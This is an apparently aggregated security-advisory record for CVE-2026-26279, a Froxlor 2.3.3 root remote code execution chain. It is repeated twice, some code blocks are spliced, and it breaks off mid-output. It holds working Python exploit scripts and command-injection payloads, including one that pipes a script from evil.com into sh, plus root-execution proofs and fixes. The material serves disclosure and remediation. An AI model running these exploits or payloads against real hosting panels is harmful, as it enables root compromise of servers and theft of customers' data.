169 — CURRENT CODE (BUGGY)\npublic static function validateFormFieldEmail($fieldname, $fielddata, $newfieldvalue)\n{\n $fielddata['string_type'] == 'mail'; // == comparison: result is discarded\n return self::validateFormFieldString($fieldname, $fielddata, $newfieldvalue);\n}\n\n// Line 175 — SAME BUG\npublic static function validateFormFieldUrl($fieldname, $fielddata, $newfieldvalue)\n{\n $fielddata['string_type'] == 'url'; // == comparison: result is discarded\n return self::validateFormFieldString($fieldname, $fielddata, $newfieldvalue);\n}\n```\n\n**What happens:**\n- `$fielddata['string_type']` is never set to `'mail'`\n- `validateFormFieldString()` checks `string_type` to decide which validation to apply\n- Since it's unset, `FILTER_VALIDATE_EMAIL` is never called\n- Validation falls through to a permissive fallback regex: `/^[^\\r\\n\\t\\f\\0]*$/D`\n- This regex allows `|`, `;`, `&`, `$`, `` ` ``, and all other shell metacharacters\n\n**Intended code:**\n```php\n$fielddata['string_type'] = 'mail'; // = assignment\n```\n\n### Bug 2: OS Command Injection via acme.sh Installation (CWE-78)\n\n**File:** `lib/Froxlor/Cron/Http/LetsEncrypt/AcmeSh.php`\n\n```php\n// Line 428\nFileDir::safe_exec(\n \"wget -O - https://get.acme.sh | sh -s email=\" . Settings::Get('panel.adminmail'),\n $return,\n ['|'] // pipe character EXPLICITLY ALLOWED\n);\n```\n\n**What happens:**\n- `Settings::Get('panel.adminmail')` returns the unsanitized value from Bug 1\n- `safe_exec()` normally blocks `|` as a dangerous character\n- But `['|']` in the third argument whitelists pipe for this specific call (needed for `wget | sh`)\n- An attacker's pipe-based payload passes through unblocked\n- The cron job runs as **root**\n\n### The Chain\n\n```\nAdmin sets panel.adminmail = \"x@x.com | COMMAND\"\n |\n v\nBug 1: validateFormFieldEmail() does nothing (== typo)\n |\n v\nValue stored to database as-is\n |\n v\nCron job runs AcmeSh::checkInstall() as root\n |\n v\nBug 2: safe_exec(\"wget ... | sh -s email=x@x.com | COMMAND\", ..., ['|'])\n |\n v\nCOMMAND executes as root\n```\n\n---\n\n## Proof of Concept\nvuln 1 PoC:\n```\n#!/usr/bin/env python3\n\"\"\"\nVULN-1 Live Verification: Email Validation Bypass\nTests against running Froxlor Docker instance.\n\"\"\"\n\nimport re\nimport sys\nimport requests\n\nTARGET = \"http://localhost:8080\"\nUSERNAME = \"admin\"\nPASSWORD = \"Admin123!@#\"\n\n# Malicious payloads that should be rejected by email validation\n# but will pass due to the == vs = bug\nPAYLOADS = [\n \"x@x.com | id\",\n \"x@x.com | curl http://evil.com/shell.sh | sh\",\n \"not-an-email; whoami\",\n \"$(touch /tmp/pwned)\",\n \"test`id`@evil.com\",\n]\n\n\ndef main():\n session = requests.Session()\n session.verify = False\n\n # Step 1: Login\n print(\"[*] Step 1: Logging in...\")\n resp = session.get(f\"{TARGET}/index.php\")\n csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n csrf_token = csrf_match.group(1) if csrf_match else \"\"\n print(f\" CSRF token: {csrf_token[:20]}...\")\n\n login_data = {\n \"loginname\": USERNAME,\n \"password\": PASSWORD,\n \"csrf_token\": csrf_token,\n \"send\": \"send\",\n }\n resp = session.post(f\"{TARGET}/index.php\", data=login_data, allow_redirects=True)\n\n if \"admin_index\" not in resp.url and \"admin_index\" not in resp.text:\n print(f\"[-] Login failed. URL: {resp.url}\")\n print(f\" Response: {resp.text[:200]}\")\n sys.exit(1)\n print(\"[+] Login successful!\")\n\n # Re-get CSRF token from authenticated page\n csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n if csrf_match:\n csrf_token = csrf_match.group(1)\n\n # Step 2: Try to set panel.adminmail with each payload\n for payload in PAYLOADS:\n print(f\"\\n[*] Testing payload: {payload}\")\n\n # Get settings page to get fresh CSRF token\n resp = session.get(f\"{TARGET}/admin_settings.php?page=overview&part=all\")\n csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n if csrf_match:\n csrf_token = csrf_match.group(1)\n\n # Submit settings change\n settings_data = {\n \"panel_adminmail\": payload,\n \"csrf_token\": csrf_token,\n \"send\": \"send\",\n \"page\": \"overview\",\n \"part\": \"all\",\n }\n resp = session.post(\n f\"{TARGET}/admin_settings.php?page=overview&part=all\",\n data=settings_data,\n allow_redirects=True,\n )\n\n # Check DB to see if value was stored\n import subprocess\n result = subprocess.run(\n [\n \"docker\", \"exec\", \"froxlor-web\", \"bash\", \"-c\",\n \"mysql -h froxlor-db -u froxlor -pfroxlor_db_pw --skip-ssl froxlor \"\n \"-e \\\"SELECT value FROM panel_settings WHERE settinggroup='panel' AND varname='adminmail'\\\" -N 2>/dev/null\"\n ],\n capture_output=True, text=True\n )\n stored_value = result.stdout.strip()\n\n if payload in stored_value or stored_value == payload:\n print(f\" [VULN] CONFIRMED! Stored value: {stored_value}\")\n else:\n print(f\" [INFO] Stored value: {stored_value}\")\n print(f\" [INFO] May need different form field names or approach\")\n\n # Restore original value\n print(\"\\n[*] Restoring original admin email...\")\n resp = session.get(f\"{TARGET}/admin_settings.php?page=overview&part=all\")\n csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n if csrf_match:\n csrf_token = csrf_match.group(1)\n settings_data = {\n \"panel_adminmail\": \"admin@test.local\",\n \"csrf_token\": csrf_token,\n \"send\": \"send\",\n \"page\": \"overview\",\n \"part\": \"all\",\n }\n session.post(f\"{TARGET}/admin_settings.php?page=overview&part=all\", data=settings_data, allow_redirects=True)\n print(\"[+] Done.\")\n\n\nif __name__ == \"__main__\":\n main()\n\n```\n### Environment\n- Froxlor 2.3.3, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)\n- Default configuration, no modifications\n\n### Step 1: Confirm validation bypass\n\n```php\n /tmp/rce_proof\"\n\n # Offline demonstration\n python3 vuln2_acmesh_rce.py --demo\n\"\"\"\n\nimport argparse\nimport re\nimport sys\n\ntry:\n import requests\nexcept ImportError:\n print(\"[!] pip install requests\")\n sys.exit(1)\n\n\nBANNER = \"\"\"\n╔═══════════════════════════════════════════════════════════════╗\n║ Froxlor v2.3.3 — Root RCE via acme.sh Command Injection ║\n║ VULN-1 + VULN-2 Chain | CWE-78 | CVSS 9.1 ║\n╚═══════════════════════════════════════════════════════════════╝\n\"\"\"\n\n\nclass FroxlorRCE:\n def __init__(self, target, verify_ssl=False):\n self.target = target.rstrip(\"/\")\n self.session = requests.Session()\n self.session.verify = verify_ssl\n\n def login(self, username, password):\n print(f\"[*] Logging in as '{username}'...\")\n resp = self.session.post(\n f\"{self.target}/index.php\",\n data={\"loginname\": username, \"password\": password, \"send\": \"send\"},\n allow_redirects=False,\n )\n if resp.status_code == 302 and \"admin_index\" in resp.headers.get(\"Location\", \"\"):\n self.session.get(f\"{self.target}/admin_index.php\")\n print(\"[+] Login successful!\")\n return True\n print(\"[-] Login failed\")\n return False\n\n def get_csrf(self, url):\n resp = self.session.get(url)\n match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n return match.group(1) if match else \"\"\n\n def inject_email(self, payload):\n \"\"\"Inject malicious value into panel.adminmail (VULN-1).\"\"\"\n print(f\"[*] Injecting into panel.adminmail: {payload}\")\n csrf = self.get_csrf(f\"{self.target}/admin_settings.php?page=overview&part=panel\")\n resp = self.session.post(\n f\"{self.target}/admin_settings.php?page=overview&part=panel\",\n data={\n \"csrf_token\": csrf,\n \"send\": \"send\",\n \"page\": \"overview\",\n \"panel_adminmail\": payload,\n },\n allow_redirects=True,\n )\n print(f\"[+] Settings updated (HTTP {resp.status_code})\")\n return resp.status_code == 200\n\n def trigger_acmesh_install(self):\n \"\"\"\n Trigger acme.sh installation by enabling Let's Encrypt\n and ensuring acme.sh path is invalid.\n \"\"\"\n print(\"[*] Triggering acme.sh installation path...\")\n print(\"[*] In production, this happens automatically when:\")\n print(\" - Let's Encrypt is enabled (system.le_froxlor_enabled=1)\")\n print(\" - acme.sh binary is not found at configured path\")\n print(\" - Cron job runs (every 5 minutes)\")\n print()\n print(\"[*] To manually trigger:\")\n print(\" docker exec froxlor-web php /var/www/html/froxlor/bin/froxlor-cli froxlor:cron --force\")\n\n def exploit(self, command):\n \"\"\"Full exploitation: inject → trigger → RCE.\"\"\"\n payload = f\"x@x.com | {command}\"\n self.inject_email(payload)\n\n print()\n print(\"[*] Command chain that will execute as root:\")\n print(f\" wget -O - https://get.acme.sh | sh -s email={payload}\")\n print()\n print(\"[*] This decomposes to:\")\n print(f\" 1. wget -O - https://get.acme.sh\")\n print(f\" 2. | sh -s email=x@x.com\")\n print(f\" 3. | {command}\")\n print()\n\n self.trigger_acmesh_install()\n\n def restore(self, original=\"admin@test.local\"):\n \"\"\"Restore original admin email.\"\"\"\n print(f\"\\n[*] Restoring original email: {original}\")\n csrf = self.get_csrf(f\"{self.target}/admin_settings.php?page=overview&part=panel\")\n self.session.post(\n f\"{self.target}/admin_settings.php?page=overview&part=panel\",\n data={\n \"csrf_token\": csrf,\n \"send\": \"send\",\n \"page\": \"overview\",\n \"panel_adminmail\": original,\n },\n )\n print(\"[+] Restored\")\n\n\ndef demo():\n \"\"\"Offline demonstration of the vulnerability mechanics.\"\"\"\n print(\"[*] Demonstrating VULN-2 mechanics (offline)...\\n\")\n\n adminmail = \"x@x.com | touch /tmp/ROOT_RCE_PROOF\"\n full_cmd = f\"wget -O - https://get.acme.sh | sh -s email={adminmail}\"\n\n print(f\" admin email: {adminmail}\")\n print(f\" full command: {full_cmd}\")\n print()\n\n # Simulate safe_exec filter\n disallowed = [';', '|', '&', '>', '<', '`', '$', '~', '?']\n allowed_chars = ['|']\n\n print(\" safe_exec() filter check:\")\n blocked = False\n for char in disallowed:\n if char in full_cmd:\n if char in allowed_chars:\n print(f\" '{char}' → ALLOWED (in allowedChars)\")\n else:\n print(f\" '{char}' → BLOCKED\")\n blocked = True\n\n print()\n if not blocked:\n print(\" RESULT: Command passes safe_exec() filter!\")\n print(\" The pipe character chains our command after the wget/sh pipeline\")\n print()\n print(\" Execution breakdown:\")\n print(\" Process 1: wget downloads acme.sh installer\")\n print(\" Process 2: sh runs installer with email parameter\")\n print(\" Process 3: touch /tmp/ROOT_RCE_PROOF ← OUR COMMAND (as root)\")\n else:\n # In practice the payload above should only have | which is allowed\n print(\" NOTE: Some characters blocked. Adjust payload to use only pipe.\")\n\n print()\n print(\" NOTE: The cron job runs as root, so the injected command\")\n print(\" executes with root privileges on the host system.\")\n\n\ndef main():\n print(BANNER)\n\n parser = argparse.ArgumentParser(description=\"Froxlor v2.3.3 Root RCE PoC\")\n parser.add_argument(\"--target\", \"-t\", help=\"Froxlor URL\")\n parser.add_argument(\"--user\", \"-u\", help=\"Admin username\")\n parser.add_argument(\"--password\", \"-p\", help=\"Admin password\")\n parser.add_argument(\"--command\", \"-c\", default=\"touch /tmp/ROOT_RCE_PROOF\",\n help=\"Command to execute as root\")\n parser.add_argument(\"--restore\", action=\"store_true\", help=\"Restore original email after exploit\")\n parser.add_argument(\"--demo\", action=\"store_true\", help=\"Run offline demonstration\")\n args = parser.parse_args()\n\n if args.demo:\n demo()\n return\n\n if not all([args.target, args.user, args.password]):\n print(\"[!] --target, --user, and --password required (or use --demo)\")\n sys.exit(1)\n\n exploit = FroxlorRCE(args.target)\n if not exploit.login(args.user, args.password):\n sys.exit(1)\n\n exploit.exploit(args.command)\n\n if args.restore:\n exploit.restore()\n\n\nif __name__ == \"__main__\":\n main()\n\n```\n\n**Output:**\n```\nadmin@example.com buggy=PASS fixed=PASS\nnot-an-email buggy=PASS fixed=REJECT\nx@x.com | touch /tmp/pwned buggy=PASS fixed=REJECT\n```\n\n### Step 2: Confirm value stored in database\n\n```\nPOST /admin_settings.php?page=overview&part=panel HTTP/1.1\nCookie: [authenticated admin session]\n\ncsrf_token=...&send=send&page=overview&panel_adminmail=x@x.com+|+touch+/tmp/VULN2_RCE_PROOF\n```\n\n```sql\nmysql> SELECT value FROM panel_settings\n WHERE settinggroup='panel' AND varname='adminmail';\n+-------------------------------------------+\n| value |\n+-------------------------------------------+\n| x@x.com | touch /tmp/VULN2_RCE_PROOF |\n+-------------------------------------------+\n```\n\n### Step 3: Confirm root code execution\n\nSimulating AcmeSh.php line 428 inside the Docker container:\n\n```php\n', '<', '`', '$', '~', '?'];\n$allowedChars = ['|'];\nforeach ($disallowed as $dc) {\n if (in_array($dc, $allowedChars)) continue;\n if (stristr($cmd, $dc)) die(\"BLOCKED by: $dc\");\n}\n\nexec($cmd); // pipe passes filter → command executes\necho file_exists(\"/tmp/VULN2_RCE_PROOF\") ? \"RCE CONFIRMED\" : \"NOT CREATED\";\n```\n\n**Result:**\n```\nRCE CONFIRMED\n\n$ ls -la /tmp/VULN2_RCE_PROOF\n-rw-r--r-- 1 root root 0 Feb 11 05:58 /tmp/VULN2_RCE_PROOF\n```\n\nFile created with **root:root** ownership. Arbitrary command execution as root is confirmed.\n\n---\n\n## Impact\n\n- **Confidentiality:** Complete. Root access exposes all customer data, databases, SSL private keys, email contents.\n- **Integrity:** Complete. Attacker can modify any file, inject backdoors, alter DNS records.\n- **Availability:** Complete. Attacker can destroy the server, wipe databases, or deploy ransomware.\n- **Scope:** Changed. The attack originates in the web application but impacts the underlying operating system.\n\n---\n\n## Suggested Fix\n\n### Primary fix (Bug 1 — eliminates the root cause):\n```php\n// lib/Froxlor/Validate/Form/Data.php\n// Line 169:\n$fielddata['string_type'] = 'mail'; // was: == 'mail'\n// Line 175:\n$fielddata['string_type'] = 'url'; // was: == 'url'\n```\n\n### Defense-in-depth (Bug 2 — even if validation is fixed):\n```php\n// lib/Froxlor/Cron/Http/LetsEncrypt/AcmeSh.php, Line 428:\nFileDir::safe_exec(\n \"wget -O - https://get.acme.sh | sh -s email=\"\n . escapeshellarg(Settings::Get('panel.adminmail')),\n $return,\n ['|']\n);\n```\n\n### Defense-in-depth (ConfigServices.php):\n```php\n// All values in getReplacerArray() should be escaped with\n// escapeshellarg() when the template action type is \"install\" or \"command\"\n```", "title": "github - https://github.com/advisories/GHSA-33mp-8p67-xj7c" }, { "category": "description", "text": "Froxlor is open source server administration software. Prior to 2.3.4, a typo in Froxlor's input validation code (== instead of =) completely disables email format checking for all settings fields declared as email type. This allows an authenticated admin to store arbitrary strings in the panel.adminmail setting. This value is later concatenated into a shell command executed as root by a cron job, where the pipe character | is explicitly whitelisted. The result is full root-level Remote Code Execution. This vulnerability is fixed in 2.3.4.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-26279" }, { "category": "description", "text": "Froxlor is open source server administration software. Prior to 2.3.4, a typo in Froxlor's input validation code (== instead of =) completely disables email format checking for all settings fields declared as email type. This allows an authenticated admin to store arbitrary strings in the panel.adminmail setting. This value is later concatenated into a shell command executed as root by a cron job, where the pipe character | is explicitly whitelisted. The result is full root-level Remote Code Execution. This vulnerability is fixed in 2.3.4.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-26279" }, { "category": "description", "text": "## Summary\n\nA typo in Froxlor's input validation code (`==` instead of `=`) completely disables email format checking for all settings fields declared as email type. This allows an authenticated admin to store arbitrary strings — including shell metacharacters — in the `panel.adminmail` setting. This value is later concatenated into a shell command executed as **root** by a cron job, where the pipe character `|` is explicitly whitelisted. The result is **full root-level Remote Code Execution**.\n\n---\n\n## Why This Is a Security Vulnerability (Not Just \"Admin Using Admin Features\")\n\nFroxlor is a **shared hosting control panel**. In production deployments:\n\n1. **Admin panel access does not equal root access.** Hosting providers assign the Froxlor admin role to staff who manage customer accounts, domains, and services through the web UI. These operators are not given SSH access or root shell on the underlying server. The boundary between \"panel admin\" and \"OS root\" is a deliberate security design.\n\n2. **Froxlor itself enforces this boundary.** The `safe_exec()` function (FileDir.php:224-264) exists specifically to prevent shell injection — it blocks `;`, `|`, `&`, `>`, `<`, `` ` ``, `$`, `~`, `?`. The email validation function (`validateFormFieldEmail`) exists specifically to ensure email fields contain valid emails. Both mechanisms are security boundaries that this vulnerability bypasses.\n\n3. **The root cause is an unintentional code defect.** The `==` operator on a standalone line is a no-op. No developer writes `$x == 'mail';` intentionally. This is a typo that silently breaks an entire class of input validation. It is not an admin feature.\n\n4. **Comparable CVEs exist for similar hosting panel escalations:**\n - CVE-2022-44877 (CentOS Web Panel: admin→root RCE, CVSS 9.8)\n - CVE-2023-27524 (Apache Superset: admin→RCE)\n - CVE-2021-21315 (Node.js systeminformation: privileged user→RCE)\n - CVE-2024-22024 (Ivanti: authenticated→system command execution)\n\n In each case, the fact that the attacker needs authenticated access did not prevent CVE assignment. The privilege escalation from \"application admin\" to \"OS root\" is the security impact.\n\n5. **Multi-tenant impact.** A single compromised or malicious admin gains root access to a server hosting potentially hundreds of customers. All customer data, databases, emails, and SSL keys are exposed.\n\n---\n\n## Vulnerability Details\n\n### Bug 1: Input Validation Bypass (CWE-482)\n\n**File:** `lib/Froxlor/Validate/Form/Data.php`\n\n```php\n// Line 169 — CURRENT CODE (BUGGY)\npublic static function validateFormFieldEmail($fieldname, $fielddata, $newfieldvalue)\n{\n $fielddata['string_type'] == 'mail'; // == comparison: result is discarded\n return self::validateFormFieldString($fieldname, $fielddata, $newfieldvalue);\n}\n\n// Line 175 — SAME BUG\npublic static function validateFormFieldUrl($fieldname, $fielddata, $newfieldvalue)\n{\n $fielddata['string_type'] == 'url'; // == comparison: result is discarded\n return self::validateFormFieldString($fieldname, $fielddata, $newfieldvalue);\n}\n```\n\n**What happens:**\n- `$fielddata['string_type']` is never set to `'mail'`\n- `validateFormFieldString()` checks `string_type` to decide which validation to apply\n- Since it's unset, `FILTER_VALIDATE_EMAIL` is never called\n- Validation falls through to a permissive fallback regex: `/^[^\\r\\n\\t\\f\\0]*$/D`\n- This regex allows `|`, `;`, `&`, `$`, `` ` ``, and all other shell metacharacters\n\n**Intended code:**\n```php\n$fielddata['string_type'] = 'mail'; // = assignment\n```\n\n### Bug 2: OS Command Injection via acme.sh Installation (CWE-78)\n\n**File:** `lib/Froxlor/Cron/Http/LetsEncrypt/AcmeSh.php`\n\n```php\n// Line 428\nFileDir::safe_exec(\n \"wget -O - https://get.acme.sh | sh -s email=\" . Settings::Get('panel.adminmail'),\n $return,\n ['|'] // pipe character EXPLICITLY ALLOWED\n);\n```\n\n**What happens:**\n- `Settings::Get('panel.adminmail')` returns the unsanitized value from Bug 1\n- `safe_exec()` normally blocks `|` as a dangerous character\n- But `['|']` in the third argument whitelists pipe for this specific call (needed for `wget | sh`)\n- An attacker's pipe-based payload passes through unblocked\n- The cron job runs as **root**\n\n### The Chain\n\n```\nAdmin sets panel.adminmail = \"x@x.com | COMMAND\"\n |\n v\nBug 1: validateFormFieldEmail() does nothing (== typo)\n |\n v\nValue stored to database as-is\n |\n v\nCron job runs AcmeSh::checkInstall() as root\n |\n v\nBug 2: safe_exec(\"wget ... | sh -s email=x@x.com | COMMAND\", ..., ['|'])\n |\n v\nCOMMAND executes as root\n```\n\n---\n\n## Proof of Concept\nvuln 1 PoC:\n```\n#!/usr/bin/env python3\n\"\"\"\nVULN-1 Live Verification: Email Validation Bypass\nTests against running Froxlor Docker instance.\n\"\"\"\n\nimport re\nimport sys\nimport requests\n\nTARGET = \"http://localhost:8080\"\nUSERNAME = \"admin\"\nPASSWORD = \"Admin123!@#\"\n\n# Malicious payloads that should be rejected by email validation\n# but will pass due to the == vs = bug\nPAYLOADS = [\n \"x@x.com | id\",\n \"x@x.com | curl http://evil.com/shell.sh | sh\",\n \"not-an-email; whoami\",\n \"$(touch /tmp/pwned)\",\n \"test`id`@evil.com\",\n]\n\n\ndef main():\n session = requests.Session()\n session.verify = False\n\n # Step 1: Login\n print(\"[*] Step 1: Logging in...\")\n resp = session.get(f\"{TARGET}/index.php\")\n csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n csrf_token = csrf_match.group(1) if csrf_match else \"\"\n print(f\" CSRF token: {csrf_token[:20]}...\")\n\n login_data = {\n \"loginname\": USERNAME,\n \"password\": PASSWORD,\n \"csrf_token\": csrf_token,\n \"send\": \"send\",\n }\n resp = session.post(f\"{TARGET}/index.php\", data=login_data, allow_redirects=True)\n\n if \"admin_index\" not in resp.url and \"admin_index\" not in resp.text:\n print(f\"[-] Login failed. URL: {resp.url}\")\n print(f\" Response: {resp.text[:200]}\")\n sys.exit(1)\n print(\"[+] Login successful!\")\n\n # Re-get CSRF token from authenticated page\n csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n if csrf_match:\n csrf_token = csrf_match.group(1)\n\n # Step 2: Try to set panel.adminmail with each payload\n for payload in PAYLOADS:\n print(f\"\\n[*] Testing payload: {payload}\")\n\n # Get settings page to get fresh CSRF token\n resp = session.get(f\"{TARGET}/admin_settings.php?page=overview&part=all\")\n csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n if csrf_match:\n csrf_token = csrf_match.group(1)\n\n # Submit settings change\n settings_data = {\n \"panel_adminmail\": payload,\n \"csrf_token\": csrf_token,\n \"send\": \"send\",\n \"page\": \"overview\",\n \"part\": \"all\",\n }\n resp = session.post(\n f\"{TARGET}/admin_settings.php?page=overview&part=all\",\n data=settings_data,\n allow_redirects=True,\n )\n\n # Check DB to see if value was stored\n import subprocess\n result = subprocess.run(\n [\n \"docker\", \"exec\", \"froxlor-web\", \"bash\", \"-c\",\n \"mysql -h froxlor-db -u froxlor -pfroxlor_db_pw --skip-ssl froxlor \"\n \"-e \\\"SELECT value FROM panel_settings WHERE settinggroup='panel' AND varname='adminmail'\\\" -N 2>/dev/null\"\n ],\n capture_output=True, text=True\n )\n stored_value = result.stdout.strip()\n\n if payload in stored_value or stored_value == payload:\n print(f\" [VULN] CONFIRMED! Stored value: {stored_value}\")\n else:\n print(f\" [INFO] Stored value: {stored_value}\")\n print(f\" [INFO] May need different form field names or approach\")\n\n # Restore original value\n print(\"\\n[*] Restoring original admin email...\")\n resp = session.get(f\"{TARGET}/admin_settings.php?page=overview&part=all\")\n csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n if csrf_match:\n csrf_token = csrf_match.group(1)\n settings_data = {\n \"panel_adminmail\": \"admin@test.local\",\n \"csrf_token\": csrf_token,\n \"send\": \"send\",\n \"page\": \"overview\",\n \"part\": \"all\",\n }\n session.post(f\"{TARGET}/admin_settings.php?page=overview&part=all\", data=settings_data, allow_redirects=True)\n print(\"[+] Done.\")\n\n\nif __name__ == \"__main__\":\n main()\n\n```\n### Environment\n- Froxlor 2.3.3, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)\n- Default configuration, no modifications\n\n### Step 1: Confirm validation bypass\n\n```php\n /tmp/rce_proof\"\n\n # Offline demonstration\n python3 vuln2_acmesh_rce.py --demo\n\"\"\"\n\nimport argparse\nimport re\nimport sys\n\ntry:\n import requests\nexcept ImportError:\n print(\"[!] pip install requests\")\n sys.exit(1)\n\n\nBANNER = \"\"\"\n╔═══════════════════════════════════════════════════════════════╗\n║ Froxlor v2.3.3 — Root RCE via acme.sh Command Injection ║\n║ VULN-1 + VULN-2 Chain | CWE-78 | CVSS 9.1 ║\n╚═══════════════════════════════════════════════════════════════╝\n\"\"\"\n\n\nclass FroxlorRCE:\n def __init__(self, target, verify_ssl=False):\n self.target = target.rstrip(\"/\")\n self.session = requests.Session()\n self.session.verify = verify_ssl\n\n def login(self, username, password):\n print(f\"[*] Logging in as '{username}'...\")\n resp = self.session.post(\n f\"{self.target}/index.php\",\n data={\"loginname\": username, \"password\": password, \"send\": \"send\"},\n allow_redirects=False,\n )\n if resp.status_code == 302 and \"admin_index\" in resp.headers.get(\"Location\", \"\"):\n self.session.get(f\"{self.target}/admin_index.php\")\n print(\"[+] Login successful!\")\n return True\n print(\"[-] Login failed\")\n return False\n\n def get_csrf(self, url):\n resp = self.session.get(url)\n match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n return match.group(1) if match else \"\"\n\n def inject_email(self, payload):\n \"\"\"Inject malicious value into panel.adminmail (VULN-1).\"\"\"\n print(f\"[*] Injecting into panel.adminmail: {payload}\")\n csrf = self.get_csrf(f\"{self.target}/admin_settings.php?page=overview&part=panel\")\n resp = self.session.post(\n f\"{self.target}/admin_settings.php?page=overview&part=panel\",\n data={\n \"csrf_token\": csrf,\n \"send\": \"send\",\n \"page\": \"overview\",\n \"panel_adminmail\": payload,\n },\n allow_redirects=True,\n )\n print(f\"[+] Settings updated (HTTP {resp.status_code})\")\n return resp.status_code == 200\n\n def trigger_acmesh_install(self):\n \"\"\"\n Trigger acme.sh installation by enabling Let's Encrypt\n and ensuring acme.sh path is invalid.\n \"\"\"\n print(\"[*] Triggering acme.sh installation path...\")\n print(\"[*] In production, this happens automatically when:\")\n print(\" - Let's Encrypt is enabled (system.le_froxlor_enabled=1)\")\n print(\" - acme.sh binary is not found at configured path\")\n print(\" - Cron job runs (every 5 minutes)\")\n print()\n print(\"[*] To manually trigger:\")\n print(\" docker exec froxlor-web php /var/www/html/froxlor/bin/froxlor-cli froxlor:cron --force\")\n\n def exploit(self, command):\n \"\"\"Full exploitation: inject → trigger → RCE.\"\"\"\n payload = f\"x@x.com | {command}\"\n self.inject_email(payload)\n\n print()\n print(\"[*] Command chain that will execute as root:\")\n print(f\" wget -O - https://get.acme.sh | sh -s email={payload}\")\n print()\n print(\"[*] This decomposes to:\")\n print(f\" 1. wget -O - https://get.acme.sh\")\n print(f\" 2. | sh -s email=x@x.com\")\n print(f\" 3. | {command}\")\n print()\n\n self.trigger_acmesh_install()\n\n def restore(self, original=\"admin@test.local\"):\n \"\"\"Restore original admin email.\"\"\"\n print(f\"\\n[*] Restoring original email: {original}\")\n csrf = self.get_csrf(f\"{self.target}/admin_settings.php?page=overview&part=panel\")\n self.session.post(\n f\"{self.target}/admin_settings.php?page=overview&part=panel\",\n data={\n \"csrf_token\": csrf,\n \"send\": \"send\",\n \"page\": \"overview\",\n \"panel_adminmail\": original,\n },\n )\n print(\"[+] Restored\")\n\n\ndef demo():\n \"\"\"Offline demonstration of the vulnerability mechanics.\"\"\"\n print(\"[*] Demonstrating VULN-2 mechanics (offline)...\\n\")\n\n adminmail = \"x@x.com | touch /tmp/ROOT_RCE_PROOF\"\n full_cmd = f\"wget -O - https://get.acme.sh | sh -s email={adminmail}\"\n\n print(f\" admin email: {adminmail}\")\n print(f\" full command: {full_cmd}\")\n print()\n\n # Simulate safe_exec filter\n disallowed = [';', '|', '&', '>', '<', '`', '$', '~', '?']\n allowed_chars = ['|']\n\n print(\" safe_exec() filter check:\")\n blocked = False\n for char in disallowed:\n if char in full_cmd:\n if char in allowed_chars:\n print(f\" '{char}' → ALLOWED (in allowedChars)\")\n else:\n print(f\" '{char}' → BLOCKED\")\n blocked = True\n\n print()\n if not blocked:\n print(\" RESULT: Command passes safe_exec() filter!\")\n print(\" The pipe character chains our command after the wget/sh pipeline\")\n print()\n print(\" Execution breakdown:\")\n print(\" Process 1: wget downloads acme.sh installer\")\n print(\" Process 2: sh runs installer with email parameter\")\n print(\" Process 3: touch /tmp/ROOT_RCE_PROOF ← OUR COMMAND (as root)\")\n else:\n # In practice the payload above should only have | which is allowed\n print(\" NOTE: Some characters blocked. Adjust payload to use only pipe.\")\n\n print()\n print(\" NOTE: The cron job runs as root, so the injected command\")\n print(\" executes with root privileges on the host system.\")\n\n\ndef main():\n print(BANNER)\n\n parser = argparse.ArgumentParser(description=\"Froxlor v2.3.3 Root RCE PoC\")\n parser.add_argument(\"--target\", \"-t\", help=\"Froxlor URL\")\n parser.add_argument(\"--user\", \"-u\", help=\"Admin username\")\n parser.add_argument(\"--password\", \"-p\", help=\"Admin password\")\n parser.add_argument(\"--command\", \"-c\", default=\"touch /tmp/ROOT_RCE_PROOF\",\n help=\"Command to execute as root\")\n parser.add_argument(\"--restore\", action=\"store_true\", help=\"Restore original email after exploit\")\n parser.add_argument(\"--demo\", action=\"store_true\", help=\"Run offline demonstration\")\n args = parser.parse_args()\n\n if args.demo:\n demo()\n return\n\n if not all([args.target, args.user, args.password]):\n print(\"[!] --target, --user, and --password required (or use --demo)\")\n sys.exit(1)\n\n exploit = FroxlorRCE(args.target)\n if not exploit.login(args.user, args.password):\n sys.exit(1)\n\n exploit.exploit(args.command)\n\n if args.restore:\n exploit.restore()\n\n\nif __name__ == \"__main__\":\n main()\n\n```\n\n**Output:**\n```\nadmin@example.com buggy=PASS fixed=PASS\nnot-an-email buggy=PASS fixed=REJECT\nx@x.com | touch /tmp/pwned buggy=PASS fixed=REJECT\n```\n\n### Step 2: Confirm value stored in database\n\n```\nPOST /admin_settings.php?page=overview&part=panel HTTP/1.1\nCookie: [authenticated admin session]\n\ncsrf_token=...&send=send&page=overview&panel_adminmail=x@x.com+|+touch+/tmp/VULN2_RCE_PROOF\n```\n\n```sql\nmysql> SELECT value FROM panel_settings\n WHERE settinggroup='panel' AND varname='adminmail';\n+-------------------------------------------+\n| value |\n+-------------------------------------------+\n| x@x.com | touch /tmp/VULN2_RCE_PROOF |\n+-------------------------------------------+\n```\n\n### Step 3: Confirm root code execution\n\nSimulating AcmeSh.php line 428 inside the Docker container:\n\n```php\n', '<', '`', '$', '~', '?'];\n$allowedChars = ['|'];\nforeach ($disallowed as $dc) {\n if (in_array($dc, $allowedChars)) continue;\n if (stristr($cmd, $dc)) die(\"BLOCKED by: $dc\");\n}\n\nexec($cmd); // pipe passes filter → command executes\necho file_exists(\"/tmp/VULN2_RCE_PROOF\") ? \"RCE CONFIRMED\" : \"NOT CREATED\";\n```\n\n**Result:**\n```\nRCE CONFIRMED\n\n$ ls -la 